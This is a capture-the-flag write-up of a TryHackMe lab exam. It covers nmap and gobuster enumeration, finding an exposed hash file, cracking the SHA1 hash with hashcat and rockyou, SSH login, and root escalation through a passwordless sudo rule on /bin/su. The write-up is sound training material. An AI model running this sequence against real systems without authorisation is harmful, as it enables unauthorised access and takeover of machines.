/ TRYHACKME, CTF, EASY

CC: Pentesting Write Up

CCPentesting

Overview

CC:Pen Testing is a guided room on TryHackMe providing an introduction to some of the common penetration testing tools. Its really well layed out and I recommend to anyone starting out in penetration testing or CTF challenges. This write up will only cover the steps for the final exam.

Nmap

As normal, I kicked off a nmap scan to see what ports are available.

└──╼ $sudo nmap -sC -sV -oA initial 10.10.215.190
[sudo] password for daz: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-08 21:42 GMT
Nmap scan report for 10.10.215.190
Host is up (0.027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2 Ports open:

  • 22 - SSH - Banner is showing its an Ubuntu machine
  • 80 - HTTP - Apache web server version 2.4.18

I also ran a full port scan but no additional ports were found.

Enumeration

The web page displays the basic apache page, I checked the source code but everything was standard. I kicked off a gobuster to see what other directories were available.

└──╼ $gobuster dir -u http://10.10.215.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.215.190
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/08 21:49:12 Starting gobuster
===============================================================
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2020/12/08 21:51:09 Finished
===============================================================

One directory found ‘/secret’, going to secret doesn’t display anything. I ran a second gobuster but this time in the secret folder and checked for .log, .txt and .html using the -x flag.

└──╼ $gobuster dir -u http://10.10.215.190/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x log,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.215.190/secret
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     log,txt,html
[+] Timeout:        10s
===============================================================
2020/12/08 21:55:16 Starting gobuster
===============================================================
/index.html (Status: 200)
/secret.txt (Status: 200)
Progress: 49450 / 220561 (22.42%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/12/08 21:59:31 Finished
===============================================================

Initial Access

1 additional file found, secret.txt. Web browsing to http://10.10.215.190/secret/secret.txt I could see the contents of the file:

nyan:046385855FC9580393853D8E(REDACTED)

The password looks to be SHA1. I put the hash in to a file called hash.txt on my VM and ran hashcat with the command: hashcat -m 100 hash.txt /usr/share/wordlists/rockyou.txt –force

Hashcat was successfully able to crack the hash and I was able to SSH in to the machine.

Priv Esc

Once connected via SSH I ran ‘sudo -l’, the user nyan is able to run the command /bin/su as root without providing a password. This provides a simple privesc by using the command: ‘sudo su’

Other techniques like this can be found on gtfobins.

nyan@ubuntu:~$ sudo -l
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
nyan@ubuntu:~$
nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/nyan# 

Thanks for reading!